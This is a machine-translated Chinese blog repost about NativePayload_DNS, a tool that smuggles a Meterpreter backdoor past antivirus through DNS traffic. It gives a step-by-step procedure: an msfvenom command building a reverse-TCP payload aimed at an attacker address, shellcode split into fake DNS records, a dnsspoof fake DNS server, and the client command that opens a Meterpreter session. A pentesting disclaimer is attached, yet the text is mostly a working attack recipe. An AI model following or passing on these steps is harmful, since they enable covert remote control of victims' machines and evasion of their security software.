NativePayload_DNS,通过DNS流量,绕过防病毒传输后门

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319

传送门

注意标点符号,必须是英文的。

通过DNS流量和绕过防病毒传输的后门有效负载的C#代码

由Damon Mohammadbagher发表

警告:此代码发布用于解释针对Pentesters和安全研究人员的反病毒漏洞

欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒文章备份地址

视频由Damon Mohammadbagher发行(bbxc9x00x1f)
绕过反病毒与DNS流量传输后门有效负载视频(需要访问YouTube)

用NativePayload_DNS和Meterpreter_Payload_Detection绕过AV视频(需要访问YouTube)

视频说明:使用NativePayload_DNS.exe绕过AV并通过Meterpreter_Payload_Detection工具检测Meterpreter进程

步骤1:

msfvenom C类型的有效负载在你的kali linux

msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt

将有效载荷从payload.txt文件复制到dns.txt,格式如下:

root @ kali:〜#cat /root/Desktop/dns.txt

1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”

1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”

1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”

1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”

步骤2:在您的kali linux中制作假DNS服务器

root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt

步骤3:

在客户端运行代码
语法:

NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”

最后你可以绕过AV,你有Meterpreter Session

欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒

通过DNS流量绕过带有传输后门有效负载的反病毒,备份地址

相关工具: 用于通过IPv6地址(AAAA)记录和DNS流量传输的Backdoor Payload的C#代码也绕过防病毒

相关链接: 用C#通过加密有效载荷绕过所有防病毒

上一篇:分布式事务中间件 Fescar - 全局写排它锁解读


下一篇:Redis&MongoDB 社区双周刊第2期:Redis&MongoDB的同步、迁移以及混合云场景构建